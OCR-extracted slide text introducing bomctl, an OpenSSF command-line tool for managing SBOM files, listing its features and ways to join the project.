e Manage writing SBOM Files to a variety of 
destinations 

e Create a CLI to wrap protobom go library 
functionality 
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bomctl: Features 


Work with multiple SBOMs in tree structures 
(through external references) 

Fetch and push SBOMs using multiple protocols 
Leverage a .netrc file to handle authentication 
Manage SBOMs using a persistent database cache 
FUTURE - Manipulate SBOMs with commands like 
diff, split, and redact 

FUTURE - Interface with OpenSSF projects and 
services like GUAC and Sigstore 
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bomctl: Get Involved 


e GitHub: https://github.com/bomctl 
e Slack: #bomctl 


e Working Group: Security Tooling 
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Is your organization a 
member of OpenSSF? 


Questions? Contact membership@openssf.or 
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